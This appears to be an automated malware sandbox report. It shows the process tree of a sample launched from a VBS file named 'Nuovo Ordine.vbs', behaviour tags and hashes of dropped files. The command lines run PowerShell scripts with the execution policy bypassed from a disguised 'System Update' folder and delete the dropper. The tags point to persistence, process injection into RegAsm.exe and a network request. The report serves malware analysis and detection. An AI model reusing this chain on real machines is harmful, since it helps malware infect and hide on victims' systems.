C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\snsix.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 6206⤵
- Program crash
PID:2320
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Nuovo Ordine.vbs"4⤵PID:4592
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2160 -ip 21601⤵PID:3640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1.2MB
MD58481d9764cda27d097559253f6c5804a
SHA1813e576e5f5ee54ee74ead61e30b6e3d04a377a3
SHA2563d641dae182ce73851fcfb842ba19ba70f0e5c2b02730fc66948cec688d3949d
SHA5123a0b4eb5fd1e01656256308c40e5eca3eb036e33fe686ce22dc6223b2057359db0da020aab8d80c1c68f0b60b17565bf37c60e76224b4fecb5c320c52d9cd282
-
Filesize
334B
MD542c53753777a97c8d1a861a85ca9ae22
SHA165e746d7ae1963ba7a8a73127dd05ea39f48ba02
SHA25661a2249146cd0a34e7083f5fb0e25687507a42254fca29986c55755f7e878d35
SHA512ed02478d9fb9550724d61d5e84b468a5623f61563e4c1d703e31ce8c096f0978926a7b662da097a5ead7dd892aeea9399c216ad52e831dffa27a63981f880e35
-
Filesize
1KB
MD59cd7321adc0a7052fffe352aac5be3e7
SHA1192c58bf5948b04b0d361501c14f67cc5c00aad4
SHA256434ffc2116c910e25d33e0f69ea4bf8176f1da5c41a263285694615f75d3562b
SHA512ce755643e59067627ca5c9191da0cd4422faa2cdc611b170a1df9789ff346345441aa042a0beff14c4a6480f19bb48ba62366556992cbdcf6ab36ead9ee33261
-
Filesize
948B
MD516841d208c2dd1e7a4e496d392fa2512
SHA12c2cc0c8b1e34ce10f50c321406f42b3b93666aa
SHA25629ca121acd239c6bda54ad1e87791c45a4bc1e247edffe0edaec86bdbaeb4a99
SHA5123b35ff95bdd1b22de4cb602c9f5bb67759c1f080943fe330377260a289c23f158dc617aec372d091e1ec995adbfca0b724c79ae1b1b653331c458cabbc7b3636
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82